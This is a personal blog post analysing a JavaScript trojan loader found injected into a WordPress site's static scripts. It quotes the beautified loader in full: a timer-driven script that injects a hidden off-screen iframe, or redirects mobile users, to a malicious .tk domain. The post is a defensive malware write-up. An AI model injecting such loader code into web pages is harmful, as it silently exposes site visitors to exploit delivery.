Unfortunate encounter with Trojan.JS.Agent.KX
Tuesday, November 17. 2015
I was surfing the other day, and suddenly ding-ding-ding, a warning! I wasn't looking for trouble, but trouble found me, again.
That box makes appearances rarely, but typically I know about it's going to happen. This time I didn't expect that. The site I went to was just a regular one, not one that in any normal circumstances would raise any red flags. My automatic second thought was "a false positive", but there it was:
Based on the scanning reports, it looks like all of the static JavaScript files on that site were infected. A closer look into a file:
function null_check() {
var e = "none";
if ("none" != e) {
var t = document.getElementById(e);
void 0 != typeof t && null != t && (t.outerHTML = "", delete t)
function browser_version_check() {
return document.all && !document.compatMode ? !0 :
document.all && !window.XMLHttpRequest ? !0 :
document.all && !document.querySelector ? !0 :
document.all && !document.addEventListener ? !0 :
document.all && !window.atob ? !0 :
document.all ? !0 :
"undefined" != typeof navigator.maxTouchPoints &&
!document.all &&
ie_check() ? !0 : !1
function ie_check() {
var e = window.navigator.userAgent,
t = e.indexOf("MSIE ");
if (t > 0) return parseInt(e.substring(t + 5, e.indexOf(".", t)), 10);
var i = e.indexOf("Trident/");
if (i > 0) {
var n = e.indexOf("rv:");
return parseInt(e.substring(n + 3, e.indexOf(".", n)), 10)
var o = e.indexOf("Edge/");
return o > 0 ? parseInt(e.substring(o + 5, e.indexOf(".", o)), 10) : !1
function user_agent_check() {
var e = window.navigator.userAgent.toLowerCase();
return /(android|bb\d+|meego).+mobile|/i.test(e.substr(0, 4)) ? !0 : !1
var intervalTimer = setInterval(function() {
if (null != document.body && "undefined" != typeof document.body) {
if (clearInterval(intervalTimer), "undefined" == typeof window.loaded_into_this_window) {
window.loaded_into_this_window = 1;
var e = ie_check() && browser_version_check(),
t = !e && !!window.chrome && "Google Inc." === window.navigator.vendor,
i = -1,
n = "http://hjjdgwtwgfgfdg.tk/052F";
if (user_agent_check() && 1 == i)
navigator.userAgent.match(/iPhone/i) || navigator.userAgent.match(/iPod/i) ?
location.replace(n) : (window.location = n, document.location = n);
else if (e && !t && !user_agent_check()) {
var o = '<div style="position:absolute;left:-3532px;"><iframe width="10px" src="' +
n + '" height="10px"></iframe></div>',
a = document.getElementsByTagName("div");
if (0 == a.length) document.body.innerHTML = document.body.innerHTML + o;
else {
var d = a.length,
r = Math.floor(d / 2);
a[r].innerHTML = a[r].innerHTML + o
}, 100);
Quite simple piece of code. It was heavily packed, so I beautified it and renamed the obfuscated function names and variables. The regexp for user agent detection was a mile long, so I shortened it by about 2000 characters. Anyway, the basic functionality of the code is to create a timer for 100 milliseconds, which when triggered on a non-mobile client create a hidden IFRAME 3532 pixels left of the user agent's viewport containing web page from http://hjjdgwtwgfgfdg.tk/052F ... which to my disappointment was already taken down. So, I didn't get to see what the actual payload was. The above code is only a loader, a means to lure the actual trojan into your box. I guess it would contain some sort of exploit in it, but as I said: some nice person already took that domain down.
How the trojan loader was injected was a no-brainer. A simple HTTP-request for /readme.html indicated, that the site was running WordPress 4.3.1, which at the time of investigating was the latest stable release. The server is running a Debian 6, a way outdated Linux distro released in February 2011 reaching end-of-life in couple of months. The thing is: Wordpress is a leaky bucket having constant flow of security alerts. Also, I know for a fact, that Debian 6 also has couple of holes here and there. So, points of entry are available for those automated bots injecting the loaders.
Anyway, I ended my investigation happy. My own box reacted as it should and the threat had been taken down already. Also the site in question was taken off-line in a couple of hours after me filing an abuse report to their ISP. All was good for a brief time ... until next incident occurs.